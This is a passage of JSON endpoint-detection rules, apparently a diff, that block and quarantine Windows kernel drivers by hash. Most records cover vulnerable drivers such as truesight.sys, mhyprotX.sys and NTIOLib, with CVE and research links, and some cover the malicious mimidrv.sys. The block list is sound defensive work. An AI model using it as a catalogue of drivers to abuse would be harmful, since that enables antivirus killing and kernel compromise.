"hash", + "value": "09bedbf7a41e0f8dabe4f41d331db58373ce15b2e9204540873a1884f38bdde1", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b58b3377-972a-5d0e-a5f1-d9aae599ce4d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142471Z", + "creation_date": "2026-03-23T11:45:31.142473Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142478Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c8c33ee4f007208b5a6f34dedd5a61d90fa27fb56c4ccba0e5a83702482106f4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b5935923-4698-519f-9c0d-715cd2c990c2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465624Z", + "creation_date": "2026-03-23T11:45:30.465628Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465637Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a74e8f94d2c140646a8bb12e3e322c49a97bd1b8a2e4327863d3623f43d65c66", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b59d9749-418e-5fa6-ab42-49a6bde2554b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473884Z", + "creation_date": "2026-03-23T11:45:30.473887Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473896Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f94c8dee30d8d349d0b51b9f1624c49ef8b6b8d54d40ecf09af95011d01b705f", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", 
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b59de7dd-7c9e-56f3-b1be-f37f12b1ecef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811608Z", + "creation_date": "2026-03-23T11:45:31.811611Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811617Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "617d5e50ebacff362232217b44ad1be06158214aa14cc46b60581acb530989fe", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b5aa5e91-bd6a-5214-a4ee-fc79c2d4a532", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821156Z", + "creation_date": "2026-03-23T11:45:31.821159Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821167Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "955887adbe6565cedb6cd793db36c5a4083e12faf5883a310e43cce8c8b2fd9e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b5b65bb7-fb1c-57ba-8177-cb13efb976b0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618271Z", + "creation_date": "2026-03-23T11:45:29.618273Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618278Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c11305fc8da85568b2d41cdf030ce260815fea848af91dc0e01076d461bab919", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b5d949d9-8be7-5dc1-8dd3-d18f5b5368dd", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808921Z", + "creation_date": "2026-03-23T11:45:31.808923Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808928Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dec61fd459bc6d34645518d47257b636ffd5ae7d1dd50452ab53afa0d9d51006", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b5e3ab8e-adeb-51ff-9ec8-56c2765211e3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829646Z", + "creation_date": "2026-03-23T11:45:31.829648Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.829653Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c175dfa16b4f37e3cfde8ee8da821ad5fc5b95f03da51996abef2ba7223c4c11", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b5efb753-7906-5b95-8b8b-ed16a063c0bb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810029Z", + "creation_date": "2026-03-23T11:45:31.810031Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810036Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ea9a74b066bc5aac4377a438217f40509c43e2f0318553ad1fb248c6dfed9fe9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b5f09107-7046-593e-9d26-cce0e4275603", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466128Z", + "creation_date": "2026-03-23T11:45:30.466132Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466141Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5295080de37d4838e15dec4e3682545033d479d3d9ac28d74747c086559fb968", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b5f1064e-988b-57c5-9df4-214c755aba76", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461268Z", + "creation_date": "2026-03-23T11:45:30.461271Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461280Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"965d4f981b54669a96c5ab02d09bf0a9850d13862425b8981f1a9271350f28bb", + "comment": "Vulnerable Kernel Driver (aka sfdrvx64.sys) [https://www.loldrivers.io/drivers/5a03dc5a-115d-4d6f-b5b5-685f4c014a69/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b61be673-4722-5513-a715-1252eb5a9aef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149260Z", + "creation_date": "2026-03-23T11:45:31.149263Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149272Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1cc45bb77bf76a530d653340ab53548c4c3353be1088c1ded3b26fdb7e324c7b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b6260e6d-05f4-52e6-a5f7-af363befb4df", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826831Z", + "creation_date": "2026-03-23T11:45:31.826833Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826838Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "684ff3390c3e0ab64e278e86f12aa11751e2f7e25e61aecb8e47b0560be5a713", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b657a637-7188-5632-8106-a82614b1bceb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156552Z", + "creation_date": "2026-03-23T11:45:31.156554Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156559Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "182fe67f10ccaf1511093d66f02d554ec14b3e35f0e9f99b40d1b6cdf6bc3774", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b68d2caf-1c49-5327-8332-a6b3db88698b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616968Z", + "creation_date": "2026-03-23T11:45:29.616970Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616976Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "df4566edea7c02e29d7dc56ff3f7da6c1ef846e1063b2805a5180bb0d6db37e8", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b68ec021-7351-5ee4-908e-a1dc72390547", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146385Z", + "creation_date": 
"2026-03-23T11:45:31.146386Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146392Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "687af130c03ad59fb35b28447dc7ba5c2cda36969d31bf38bf3ebe676ede48ae", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b691a5ca-8282-503f-9990-cfbf2974187d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825307Z", + "creation_date": "2026-03-23T11:45:31.825310Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825318Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e6955b73194b48410331b0518e68dec23d8a40107dd72209b9097ae9a361f13d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "b6949fef-552c-55c6-b14c-61c8e6e050df", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622419Z", + "creation_date": "2026-03-23T11:45:29.622421Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622427Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "38b3eb8c86201d26353aab625cea672e60c2f66ce6f5e5eda673e8c3478bf305", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b694df8b-c982-5db3-a254-68d595fec621", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814547Z", + "creation_date": "2026-03-23T11:45:31.814550Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814560Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9f1628f379703dcf5a0711782af2a2dd895b1a57cacfd3e29f013fb074dc4174", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b6984ab0-6362-59b4-b954-1b8544ebf91f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826389Z", + "creation_date": "2026-03-23T11:45:30.826391Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826397Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4144c5acae0a44ca3b2abbb9346bd17621bcdaaf66107ab5f4059d594b645bd1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b69e3285-6453-5b93-bdc5-e4f328ee3d36", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457564Z", + "creation_date": "2026-03-23T11:45:30.457567Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457576Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aff3f4d25b85b6b3147d2b7f586edc3e9aa2ec25c37d5dc7ad809d99677497ea", + "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b69f342a-feab-5c85-ac01-b28254e4512a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612037Z", + "creation_date": "2026-03-23T11:45:29.612039Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612045Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + 
"type": "hash", + "value": "475e5016c9c0f5a127896f9179a1b1577a67b357f399ab5a1e68aab07134729a", + "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b6a1f8a5-1ca6-5739-a64e-b10b8a1a8762", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481468Z", + "creation_date": "2026-03-23T11:45:30.481472Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481480Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a66b4420fa1df81a517e2bbea1a414b57721c67a4aa1df1967894f77e81d036e", + "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b6ae8e70-0b6b-5dbc-ad9b-0dd6cfcb4d1f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 
1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487378Z", + "creation_date": "2026-03-23T11:45:31.487380Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487386Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "12428d69268adc7d6bf9c1e74b3e799cabe8319bffb47729385205b17c43a40b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b6b12588-2faf-5dfa-a97d-0f8f31256ee2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 